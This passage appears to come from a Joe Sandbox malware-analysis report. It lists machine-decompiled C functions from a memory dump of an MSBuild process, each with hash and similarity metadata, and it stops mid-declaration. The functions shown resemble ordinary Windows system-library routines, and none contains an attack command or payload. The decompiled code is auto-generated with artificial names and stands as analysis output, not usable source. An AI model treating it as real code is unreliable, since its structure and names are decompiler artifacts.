                                            				void* _t153;
                                            				signed int _t155;
                                            				signed int _t159;
                                            				char _t166;
                                            				void* _t172;
                                            				void* _t176;
                                            				signed int _t177;
                                            				intOrPtr* _t179;
                                            
                                            				_t179 = __ecx;
                                            				_v48 = __edx;
                                            				_v68 = 0;
                                            				_v72 = 0;
                                            				_push(__ecx[1]);
                                            				_push( *__ecx);
                                            				_push(0);
                                            				_t153 = 0x14;
                                            				_t135 = _t153;
                                            				_t132 = E010CBBBB(_t135, _t153);
                                            				if(_t132 == 0) {
                                            					_t166 = _v68;
                                            					goto L43;
                                            				} else {
                                            					_t155 = 0;
                                            					_v52 = 0;
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					_v56 = __ecx[1];
                                            					if( *__ecx >> 8 < 2) {
                                            						_t155 = 1;
                                            						_v52 = 1;
                                            					}
                                            					_t139 = _a4;
                                            					_t87 = (_t155 << 0xc) + _t139;
                                            					_v60 = _t87;
                                            					if(_t87 < _t139) {
                                            						L11:
                                            						_t166 = _v68;
                                            						L12:
                                            						if(_t132 != 0) {
                                            							E010CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                            						}
                                            						L43:
                                            						if(_v72 != 0) {
                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                            							_push( *_t179);
                                            							_push(0x8000);
                                            							E010CAFDE( &_v72,  &_v60);
                                            						}
                                            						L46:
                                            						return _t166;
                                            					}
                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                            					asm("sbb edi, edi");
                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                            					if(_t90 != 0) {
                                            						_push(0);
                                            						_push(0x14);
                                            						_push( &_v44);
                                            						_push(3);
                                            						_push(_t179);
                                            						_push(0xffffffff);
                                            						if(E01049730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                            							_push(_t139);
                                            							E010CA80D(_t179, 1, _v40, 0);
                                            							_t172 = 4;
                                            						}
                                            					}
                                            					_t141 =  &_v72;
                                            					if(E010CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                            						_v64 = _a4;
                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                            						asm("sbb edi, edi");
                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                            						if(_t94 != 0) {
                                            							_push(0);
                                            							_push(0x14);
                                            							_push( &_v24);
                                            							_push(3);
                                            							_push(_t179);
                                            							_push(0xffffffff);
                                            							if(E01049730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                            								_push(_t141);
                                            								E010CA80D(_t179, 1, _v20, 0);
                                            								_t176 = 4;
                                            							}
                                            						}
                                            						if(E010CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                            							goto L11;
                                            						} else {
                                            							_t177 = _v64;
                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                            							_t100 = _v52 + _v52;
                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                            							 *(_t132 + 0x10) = _t146;
                                            							asm("bsf eax, [esp+0x18]");
                                            							_v52 = _t100;
                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                            							_t47 =  &_a8;
                                            							 *_t47 = _a8 & 0x00000001;
                                            							if( *_t47 == 0) {
                                            								E01022280(_t179 + 0x30, _t179 + 0x30);
                                            							}
                                            							_t147 =  *(_t179 + 0x34);
                                            							_t159 =  *(_t179 + 0x38) & 1;
                                            							_v68 = 0;
                                            							if(_t147 == 0) {
                                            								L35:
                                            								E0101B090(_t179 + 0x34, _t147, _v68, _t132);
                                            								if(_a8 == 0) {
                                            									E0101FFB0(_t132, _t177, _t179 + 0x30);
                                            								}
                                            								asm("lock xadd [eax], ecx");
                                            								asm("lock xadd [eax], edx");
                                            								_t132 = 0;
                                            								_v72 = _v72 & 0;
                                            								_v68 = _v72;
                                            								if(E01027D50() == 0) {
                                            									_t113 = 0x7ffe0388;
                                            								} else {
                                            									_t177 = _v64;
                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            								}
                                            								if( *_t113 == _t132) {
                                            									_t166 = _v68;
                                            									goto L46;
                                            								} else {
                                            									_t166 = _v68;
                                            									E010BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                            									goto L12;
                                            								}
                                            							} else {
                                            								L23:
                                            								while(1) {
                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                            										_t122 =  *_t147;
                                            										if(_t159 == 0) {
                                            											L32:
                                            											if(_t122 == 0) {
                                            												L34:
                                            												_v68 = 0;
                                            												goto L35;
                                            											}
                                            											L33:
                                            											_t147 = _t122;
                                            											continue;
                                            										}
                                            										if(_t122 == 0) {
                                            											goto L34;
                                            										}
                                            										_t122 = _t122 ^ _t147;
                                            										goto L32;
                                            									}
                                            									_t122 =  *(_t147 + 4);
                                            									if(_t159 == 0) {
                                            										L27:
                                            										if(_t122 != 0) {
                                            											goto L33;
                                            										}
                                            										L28:
                                            										_v68 = 1;
                                            										goto L35;
                                            									}
                                            									if(_t122 == 0) {
                                            										goto L28;
                                            									}
                                            									_t122 = _t122 ^ _t147;
                                            									goto L27;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_v72 = _v72 & 0x00000000;
                                            					goto L11;
                                            				}
                                            			}





































                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction ID: 45360eaf275deead8ad53860c884048ab0d1fecb6bd95ba7fc182518f1296d7b
                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction Fuzzy Hash: C9916C712043429BE764CF29C841B5BBBE5BF88B14F14896DF6D98B280E774E908CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E010851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed short* _t63;
                                            				signed int _t64;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t74;
                                            				intOrPtr _t84;
                                            				intOrPtr _t88;
                                            				intOrPtr _t94;
                                            				void* _t100;
                                            				void* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				short* _t108;
                                            				signed int _t110;
                                            				signed int _t113;
                                            				signed int* _t115;
                                            				signed short* _t117;
                                            				void* _t118;
                                            				void* _t119;
                                            
                                            				_push(0x80);
                                            				_push(0x10e05f0);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                            				_t115 =  *(_t118 + 0xc);
                                            				 *(_t118 - 0x7c) = _t115;
                                            				 *((char*)(_t118 - 0x65)) = 0;
                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            				_t113 = 0;
                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                            				_t100 = __ecx;
                                            				if(_t100 == 0) {
                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            					E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *((char*)(_t118 - 0x65)) = 1;
                                            					_t63 =  *(_t118 - 0x90);
                                            					_t101 = _t63[2];
                                            					_t64 =  *_t63 & 0x0000ffff;
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					L20:
                                            					_t65 = _t64 >> 1;
                                            					L21:
                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                            					if(_t108 == 0) {
                                            						L27:
                                            						 *_t115 = _t65 + 1;
                                            						_t67 = 0xc0000023;
                                            						L28:
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                            						L29:
                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                            						E010853CA(0);
                                            						return E0105D130(0, _t113, _t115);
                                            					}
                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                            							 *_t108 = 0;
                                            						}
                                            						goto L27;
                                            					}
                                            					 *_t115 = _t65;
                                            					_t115 = _t65 + _t65;
                                            					E0104F3E0(_t108, _t101, _t115);
                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                            					_t67 = 0;
                                            					goto L28;
                                            				}
                                            				_t103 = _t100 - 1;
                                            				if(_t103 == 0) {
                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                            					_t74 = E01023690(1, _t117, 0xfe1810, _t118 - 0x74);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                            					_t101 = _t117[2];
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					if(_t74 < 0) {
                                            						_t64 =  *_t117 & 0x0000ffff;
                                            						_t115 =  *(_t118 - 0x7c);
                                            						goto L20;
                                            					}
                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                            					_t115 =  *(_t118 - 0x7c);
                                            					goto L21;
                                            				}
                                            				if(_t103 == 1) {
                                            					_t105 = 4;
                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                            					_push(_t118 - 0x70);
                                            					_push(0);
                                            					_push(0);
                                            					_push(_t105);
                                            					_push(_t118 - 0x78);
                                            					_push(0x6b);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = E0104AA90();
                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            					_t113 = L01024620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                            					if(_t113 != 0) {
                                            						_push(_t118 - 0x70);
                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                            						_push(_t113);
                                            						_push(4);
                                            						_push(_t118 - 0x78);
                                            						_push(0x6b);
                                            						_t84 = E0104AA90();
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                            						if(_t84 < 0) {
                                            							goto L29;
                                            						}
                                            						_t110 = 0;
                                            						_t106 = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                            							 *(_t118 - 0x88) = _t106;
                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                            								break;
                                            							}
                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                            							_t106 = _t106 + 1;
                                            						}
                                            						_t88 = E0108500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                            						_t119 = _t119 + 0x1c;
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                            						if(_t88 < 0) {
                                            							goto L29;
                                            						}
                                            						_t101 = _t118 - 0x3c;
                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                            						goto L21;
                                            					}
                                            					_t67 = 0xc0000017;
                                            					goto L28;
                                            				}
                                            				_push(0);
                                            				_push(0x20);
                                            				_push(_t118 - 0x60);
                                            				_push(0x5a);
                                            				_t94 = E01049860();
                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                            				if(_t94 < 0) {
                                            					goto L29;
                                            				}
                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                            					_t101 = L"Legacy";
                                            					_push(6);
                                            				} else {
                                            					_t101 = L"UEFI";
                                            					_push(4);
                                            				}
                                            				_pop(_t65);
                                            				goto L21;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: dd38d00273dc9e4846601a8e58b33d1cfe9b9b423e95ec0ff45a779265a88b48
                                            • Instruction ID: be6648be8b8998535284e09af09f47121df1486d6279f4a48fa250dd27ca2722
                                            • Opcode Fuzzy Hash: dd38d00273dc9e4846601a8e58b33d1cfe9b9b423e95ec0ff45a779265a88b48
                                            • Instruction Fuzzy Hash: AA516FB1A046199FDB25EFA9CC40BAEBBF8FB48700F14806DE5C9EB251DB719941CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E0102B944(signed int* __ecx, char __edx) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				char _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				signed int* _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				char _v77;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				char* _t73;
                                            				intOrPtr _t77;
                                            				intOrPtr _t78;
                                            				signed int _t82;
                                            				intOrPtr _t83;
                                            				void* _t87;
                                            				char _t88;
                                            				intOrPtr* _t89;
                                            				intOrPtr _t91;
                                            				void* _t97;
                                            				intOrPtr _t100;
                                            				void* _t102;
                                            				void* _t107;
                                            				signed int _t108;
                                            				intOrPtr* _t112;
                                            				void* _t113;
                                            				intOrPtr* _t114;
                                            				intOrPtr _t115;
                                            				intOrPtr _t116;
                                            				intOrPtr _t117;
                                            				signed int _t118;
                                            				void* _t130;
                                            
                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                            				_v8 =  *0x10fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                            				_t112 = __ecx;
                                            				_v77 = __edx;
                                            				_v48 = __ecx;
                                            				_v28 = 0;
                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                            				_t105 =  *_t5;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(_t105 == 0) {
                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                            					_t60 =  *__ecx |  *_t50;
                                            					if(( *__ecx |  *_t50) != 0) {
                                            						 *__ecx = 0;
                                            						__ecx[1] = 0;
                                            						if(E01027D50() != 0) {
                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t65 = 0x7ffe0386;
                                            						}
                                            						if( *_t65 != 0) {
                                            							E010D8CD6(_t112);
                                            						}
                                            						_push(0);
                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t52);
                                            						_t60 = E01049E20();
                                            					}
                                            					L20:
                                            					_pop(_t107);
                                            					_pop(_t113);
                                            					_pop(_t87);
                                            					return E0104B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                            				}
                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                            				_t67 =  *_t8;
                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                            				_t108 =  *(_t67 + 0x14);
                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                            				_t105 = 0x2710;
                                            				asm("sbb eax, edi");
                                            				_v44 = _t88;
                                            				_v52 = _t108;
                                            				_t60 = E0104CE00(_t97, _t68, 0x2710, 0);
                                            				_v56 = _t60;
                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                            					L3:
                                            					 *(_t112 + 0x44) = _t60;
                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                            					 *_t112 = _t88;
                                            					 *(_t112 + 4) = _t108;
                                            					_v20 = _t60 * 0x2710;
                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                            					if(_v77 != 0) {
                                            						L16:
                                            						_v36 = _t88;
                                            						_v32 = _t108;
                                            						if(E01027D50() != 0) {
                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t73 = 0x7ffe0386;
                                            						}
                                            						if( *_t73 != 0) {
                                            							_t105 = _v40;
                                            							E010D8F6A(_t112, _v40, _t88, _t108);
                                            						}
                                            						_push( &_v28);
                                            						_push(0);
                                            						_push( &_v36);
                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t48);
                                            						_t60 = E0104AF60();
                                            						goto L20;
                                            					} else {
                                            						_t89 = 0x7ffe03b0;
                                            						do {
                                            							_t114 = 0x7ffe0010;
                                            							do {
                                            								_t77 =  *0x10f8628; // 0x0
                                            								_v68 = _t77;
                                            								_t78 =  *0x10f862c; // 0x0
                                            								_v64 = _t78;
                                            								_v72 =  *_t89;
                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                            								while(1) {
                                            									_t105 =  *0x7ffe000c;
                                            									_t100 =  *0x7ffe0008;
                                            									if(_t105 ==  *_t114) {
                                            										goto L8;
                                            									}
                                            									asm("pause");
                                            								}
                                            								L8:
                                            								_t89 = 0x7ffe03b0;
                                            								_t115 =  *0x7ffe03b0;
                                            								_t82 =  *0x7FFE03B4;
                                            								_v60 = _t115;
                                            								_t114 = 0x7ffe0010;
                                            								_v56 = _t82;
                                            							} while (_v72 != _t115 || _v76 != _t82);
                                            							_t83 =  *0x10f8628; // 0x0
                                            							_t116 =  *0x10f862c; // 0x0
                                            							_v76 = _t116;
                                            							_t117 = _v68;
                                            						} while (_t117 != _t83 || _v64 != _v76);
                                            						asm("sbb edx, [esp+0x24]");
                                            						_t102 = _t100 - _v60 - _t117;
                                            						_t112 = _v48;
                                            						_t91 = _v44;
                                            						asm("sbb edx, eax");
                                            						_t130 = _t105 - _v52;
                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                            							_t88 = _t102 - _t91;
                                            							asm("sbb edx, edi");
                                            							_t108 = _t105;
                                            						} else {
                                            							_t88 = 0;
                                            							_t108 = 0;
                                            						}
                                            						goto L16;
                                            					}
                                            				} else {
                                            					if( *(_t112 + 0x44) == _t60) {
                                            						goto L20;
                                            					}
                                            					goto L3;
                                            				}
                                            			}

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0102B9A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 885266447-0
                                            • Opcode ID: bc1de9feee39f10db14ab258a06908fe47ee931484e3e71ad7c85c3b63620761
                                            • Instruction ID: d314379b70715c2d2c81566c70ee795217140bf8c317913ccd99ed63940d72e6
                                            • Opcode Fuzzy Hash: bc1de9feee39f10db14ab258a06908fe47ee931484e3e71ad7c85c3b63620761
                                            • Instruction Fuzzy Hash: 82515871A08311CFC721DF2DC48092ABBF5FB88600F1489AEEAC587355D771E844CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0100B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                            				signed int _t65;
                                            				signed short _t69;
                                            				intOrPtr _t70;
                                            				signed short _t85;
                                            				void* _t86;
                                            				signed short _t89;
                                            				signed short _t91;
                                            				intOrPtr _t92;
                                            				intOrPtr _t97;
                                            				intOrPtr* _t98;
                                            				signed short _t99;
                                            				signed short _t101;
                                            				void* _t102;
                                            				char* _t103;
                                            				signed short _t104;
                                            				intOrPtr* _t110;
                                            				void* _t111;
                                            				void* _t114;
                                            				intOrPtr* _t115;
                                            
                                            				_t109 = __esi;
                                            				_t108 = __edi;
                                            				_t106 = __edx;
                                            				_t95 = __ebx;
                                            				_push(0x90);
                                            				_push(0x10df7a8);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                            				if(__edx == 0xffffffff) {
                                            					L6:
                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) != 0) {
                                            						L3:
                                            						L4:
                                            						return E0105D130(_t95, _t108, _t109);
                                            					}
                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                            					_t108 = 0;
                                            					_t109 = 0;
                                            					_t95 = 0;
                                            					__eflags = 0;
                                            					while(1) {
                                            						__eflags = _t95 - 0x200;
                                            						if(_t95 >= 0x200) {
                                            							break;
                                            						}
                                            						E0104D000(0x80);
                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                            						_t108 = _t115;
                                            						_t95 = _t95 - 0xffffff80;
                                            						_t17 = _t114 - 4;
                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                            						__eflags =  *_t17;
                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t102 = _t110 + 1;
                                            						do {
                                            							_t85 =  *_t110;
                                            							_t110 = _t110 + 1;
                                            							__eflags = _t85;
                                            						} while (_t85 != 0);
                                            						_t111 = _t110 - _t102;
                                            						_t21 = _t95 - 1; // -129
                                            						_t86 = _t21;
                                            						__eflags = _t111 - _t86;
                                            						if(_t111 > _t86) {
                                            							_t111 = _t86;
                                            						}
                                            						E0104F3E0(_t108, _t106, _t111);
                                            						_t115 = _t115 + 0xc;
                                            						_t103 = _t111 + _t108;
                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                            						_t89 = _t95 - _t111;
                                            						__eflags = _t89;
                                            						_push(0);
                                            						if(_t89 == 0) {
                                            							L15:
                                            							_t109 = 0xc000000d;
                                            							goto L16;
                                            						} else {
                                            							__eflags = _t89 - 0x7fffffff;
                                            							if(_t89 <= 0x7fffffff) {
                                            								L16:
                                            								 *(_t114 - 0x94) = _t109;
                                            								__eflags = _t109;
                                            								if(_t109 < 0) {
                                            									__eflags = _t89;
                                            									if(_t89 != 0) {
                                            										 *_t103 = 0;
                                            									}
                                            									L26:
                                            									 *(_t114 - 0xa0) = _t109;
                                            									 *(_t114 - 4) = 0xfffffffe;
                                            									__eflags = _t109;
                                            									if(_t109 >= 0) {
                                            										L31:
                                            										_t98 = _t108;
                                            										_t39 = _t98 + 1; // 0x1
                                            										_t106 = _t39;
                                            										do {
                                            											_t69 =  *_t98;
                                            											_t98 = _t98 + 1;
                                            											__eflags = _t69;
                                            										} while (_t69 != 0);
                                            										_t99 = _t98 - _t106;
                                            										__eflags = _t99;
                                            										L34:
                                            										_t70 =  *[fs:0x30];
                                            										__eflags =  *((char*)(_t70 + 2));
                                            										if( *((char*)(_t70 + 2)) != 0) {
                                            											L40:
                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                            											 *(_t114 - 4) = 1;
                                            											_push(_t114 - 0x74);
                                            											L0105DEF0(_t99, _t106);
                                            											 *(_t114 - 4) = 0xfffffffe;
                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            											goto L3;
                                            										}
                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                            											goto L40;
                                            										}
                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                            										_push(_t99 & 0x0000ffff);
                                            										_push(_t108);
                                            										_push(1);
                                            										_t101 = E0104B280();
                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                            											__eflags = _t101 - 0x80000003;
                                            											if(_t101 == 0x80000003) {
                                            												E0104B7E0(1);
                                            												_t101 = 0;
                                            												__eflags = 0;
                                            											}
                                            										}
                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            										goto L4;
                                            									}
                                            									__eflags = _t109 - 0x80000005;
                                            									if(_t109 == 0x80000005) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								 *(_t114 - 0x90) = 0;
                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                            								_t91 = E0104E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                            								_t115 = _t115 + 0x10;
                                            								_t104 = _t91;
                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                            								__eflags = _t104;
                                            								if(_t104 < 0) {
                                            									L21:
                                            									_t109 = 0x80000005;
                                            									 *(_t114 - 0x90) = 0x80000005;
                                            									L22:
                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                            									L23:
                                            									 *(_t114 - 0x94) = _t109;
                                            									goto L26;
                                            								}
                                            								__eflags = _t104 - _t92;
                                            								if(__eflags > 0) {
                                            									goto L21;
                                            								}
                                            								if(__eflags == 0) {
                                            									goto L22;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L15;
                                            						}
                                            					}
                                            					__eflags = _t109;
                                            					if(_t109 >= 0) {
                                            						goto L31;
                                            					}
                                            					__eflags = _t109 - 0x80000005;
                                            					if(_t109 != 0x80000005) {
                                            						goto L31;
                                            					}
                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                            					_t38 = _t95 - 1; // -129
                                            					_t99 = _t38;
                                            					goto L34;
                                            				}
                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            					__eflags = __edx - 0x65;
                                            					if(__edx != 0x65) {
                                            						goto L2;
                                            					}
                                            					goto L6;
                                            				}
                                            				L2:
                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                            				_push(_t106);
                                            				if(E0104A890() != 0) {
                                            					goto L6;
                                            				}
                                            				goto L3;
                                            			}


                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: 95d697d0cc84f697d717cf9526aca1e682190a66ad008913b096907bef2503ba
                                            • Instruction ID: e69e7ba9eb7f981db02945e0c08726d37caebfb3343770d7d89c191a00f6d525
                                            • Opcode Fuzzy Hash: 95d697d0cc84f697d717cf9526aca1e682190a66ad008913b096907bef2503ba
                                            • Instruction Fuzzy Hash: 4151DF71D0025A8FEB66CF688844BEEBBF4BF00710F1041A9D899EB282D7754945CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E01032581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200319, char _a1546911999) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				unsigned int _v24;
                                            				void* _v28;
                                            				signed int _v32;
                                            				unsigned int _v36;
                                            				signed int _v37;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _t237;
                                            				signed int _t241;
                                            				void* _t245;
                                            				void* _t246;
                                            				signed int _t251;
                                            				signed int _t253;
